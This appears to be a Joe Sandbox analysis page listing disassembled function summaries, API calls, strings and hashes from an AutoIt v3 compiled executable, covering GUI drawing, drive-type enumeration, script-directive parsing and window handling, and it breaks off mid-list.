Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: ec2639f69f933706b11dccfb949893be1b9929587e6cb69f8a25289cd697609d
Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
Opcode Fuzzy Hash: ec2639f69f933706b11dccfb949893be1b9929587e6cb69f8a25289cd697609d
Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A

Function 004774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 004774DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
GetClientRect.USER32(00000000,?), ref: 0047763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
GetStockObject.GDI32(00000011), ref: 004776A2
SelectObject.GDI32(00000000,00000000), ref: 004776A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
DeleteDC.GDI32(00000000), ref: 004776C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
GetStockObject.GDI32(00000011), ref: 004777A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB

Strings

static, xrefs: 0047767D, 00477795
DISPLAY, xrefs: 00477688
AutoIt v3, xrefs: 0047762B
msctls_progress32, xrefs: 0047773C

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
Opcode Fuzzy Hash: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68

Function 0046AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59

Strings

SCSI, xrefs: 0046AEC6
ATA, xrefs: 0046AED4
Fibre, xrefs: 0046AEE9
FileBackedVirtual, xrefs: 0046AF28
\\.\, xrefs: 0046AD70
SATA, xrefs: 0046AF0C
SAS, xrefs: 0046AF05
SSD, xrefs: 0046AE86
Removable, xrefs: 0046AE4D
1394, xrefs: 0046AEDB
ATAPI, xrefs: 0046AECD
USB, xrefs: 0046AEF0
Network, xrefs: 0046AE39
MMC, xrefs: 0046AF1A
RAID, xrefs: 0046AEF7
CDROM, xrefs: 0046AE2F
iSCSI, xrefs: 0046AEFE
PhysicalDrive, xrefs: 0046ADA7
Virtual, xrefs: 0046AF21
Unknown, xrefs: 0046AE1B, 0046AEBF
RAMDisk, xrefs: 0046AE25
Fixed, xrefs: 0046AE43
SSA, xrefs: 0046AEE2

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
Opcode Fuzzy Hash: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F

Function 004068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00406931
__wcsnicmp.LIBCMT ref: 00406949
__wcsnicmp.LIBCMT ref: 00406961
__wcsnicmp.LIBCMT ref: 00406979
__wcsnicmp.LIBCMT ref: 00406991
__wcsnicmp.LIBCMT ref: 004069A9
__wcsnicmp.LIBCMT ref: 004069C1
__wcsnicmp.LIBCMT ref: 004069D5
__wcsnicmp.LIBCMT ref: 00406A16
__wcsnicmp.LIBCMT ref: 00406A2A
__wcsnicmp.LIBCMT ref: 00406A3E
__wcsnicmp.LIBCMT ref: 00406A52

Strings

#include, xrefs: 004069A3
#pragma compile, xrefs: 0040692B
Unterminated group of comments, xrefs: 0043E403
Cannot parse #include, xrefs: 0043E3F0
Bad directive syntax error, xrefs: 0043E31A
#OnAutoItStartRegister, xrefs: 00406973
#ce, xrefs: 00406A4C
#requireadmin, xrefs: 0040695B
#include-once, xrefs: 0040698B
#comments-end, xrefs: 00406A38
#notrayicon, xrefs: 00406943
#comments-start, xrefs: 004069BB, 00406A10
#cs, xrefs: 004069CF, 00406A24

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 8fb65e0ec88afc54829611c8f5f854c2612842bad9cfce82bf920dde39785c66
Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
Opcode Fuzzy Hash: 8fb65e0ec88afc54829611c8f5f854c2612842bad9cfce82bf920dde39785c66
Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D

Function 0048A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0048A903
SetTextColor.GDI32(?,?), ref: 0048A907
GetSysColorBrush.USER32(0000000F), ref: 0048A91D
GetSysColor.USER32(0000000F), ref: 0048A928
CreateSolidBrush.GDI32(?), ref: 0048A92D
GetSysColor.USER32(00000011), ref: 0048A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
SelectObject.GDI32(?,00000000), ref: 0048A964
SetBkColor.GDI32(?,00000000), ref: 0048A96D
SelectObject.GDI32(?,?), ref: 0048A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
DrawFocusRect.USER32(?,?), ref: 0048AA3D
GetSysColor.USER32(00000011), ref: 0048AA4B
SetTextColor.GDI32(?,00000000), ref: 0048AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
DeleteObject.GDI32(?), ref: 0048AA89
SelectObject.GDI32(?,?), ref: 0048AA8F
DeleteObject.GDI32(?), ref: 0048AA94
SetTextColor.GDI32(?,?), ref: 0048AA9A
SetBkColor.GDI32(?,?), ref: 0048AAA4

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: bd028f769453b6c3e6d525d3156cee2d00902cec730831e2e236b148d654384e
Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
Opcode Fuzzy Hash: bd028f769453b6c3e6d525d3156cee2d00902cec730831e2e236b148d654384e
Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54

Function 004889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
CharNextW.USER32(0000014E), ref: 00488B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
_memset.LIBCMT ref: 00488C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
_memset.LIBCMT ref: 00488CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
DrawMenuBar.USER32(?), ref: 00488EC3
SetWindowTextW.USER32(?,0000014E), ref: 00488EEB

Strings

0, xrefs: 00488E55

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: e753816477743e7a4e61ca736823783773d43a39939b42629400f0583fecbb55
Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
Opcode Fuzzy Hash: e753816477743e7a4e61ca736823783773d43a39939b42629400f0583fecbb55
Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69

Function 0048488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004849CA
GetDesktopWindow.USER32 ref: 004849DF
GetWindowRect.USER32(00000000), ref: 004849E6
GetWindowLongW.USER32(?,000000F0), ref: 00484A48
DestroyWindow.USER32(?), ref: 00484A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
IsWindowVisible.USER32(?), ref: 00484B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
GetWindowRect.USER32(?,?), ref: 00484B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
CopyRect.USER32(?,?), ref: 00484BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00484C32

Strings

(, xrefs: 00484BA3
0, xrefs: 00484975
tooltips_class32, xrefs: 00484A96

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59

Function 0046449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
_wcscpy.LIBCMT ref: 00464500
_wcscmp.LIBCMT ref: 0046450B
_wcscat.LIBCMT ref: 00464521
_wcsstr.LIBCMT ref: 0046452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
_wcscat.LIBCMT ref: 00464591
_wcscat.LIBCMT ref: 00464598
_wcsncpy.LIBCMT ref: 004645C3

Strings

\VarFileInfo\Translation, xrefs: 00464540
StringFileInfo\, xrefs: 0046451B
DefaultLangCodepage, xrefs: 004645AB
%u.%u.%u.%u, xrefs: 00464626
04090000, xrefs: 0046457E

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 53d0201630e263c5990b269de9c0b8710adae52f837daff250be36eb893d5207
Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
Opcode Fuzzy Hash: 53d0201630e263c5990b269de9c0b8710adae52f837daff250be36eb893d5207
Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE

Function 004027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
GetSystemMetrics.USER32(00000007), ref: 004028C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
GetSystemMetrics.USER32(00000008), ref: 004028F7
GetSystemMetrics.USER32(00000004), ref: 0040291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
GetClientRect.USER32(00000000,000000FF), ref: 004029AE
GetStockObject.GDI32(00000011), ref: 004029CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5

Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7

SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC

Strings

AutoIt v3 GUI, xrefs: 00402974

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 0ddfe26c217068a9ad73fc7eeebea318cc8e3801df756c5088895dcd405de17b
Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
Opcode Fuzzy Hash: 0ddfe26c217068a9ad73fc7eeebea318cc8e3801df756c5088895dcd405de17b
Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58

Function 0045A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
__swprintf.LIBCMT ref: 0045A51B
_wcscmp.LIBCMT ref: 0045A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
_wcscmp.LIBCMT ref: 0045A5BF
GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
GetDlgCtrlID.USER32(?), ref: 0045A648
GetWindowRect.USER32(?,?), ref: 0045A67E
GetParent.USER32(?), ref: 0045A69C
ScreenToClient.USER32(00000000), ref: 0045A6A3
GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
_wcscmp.LIBCMT ref: 0045A731
GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
_wcscmp.LIBCMT ref: 0045A76B

Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634

Strings

%s%u, xrefs: 0045A515

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
Opcode Fuzzy Hash: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A

Function 0045AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
_wcscmp.LIBCMT ref: 0045AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
_wcscmp.LIBCMT ref: 0045AF8C
_wcsstr.LIBCMT ref: 0045AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
_wcscmp.LIBCMT ref: 0045AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
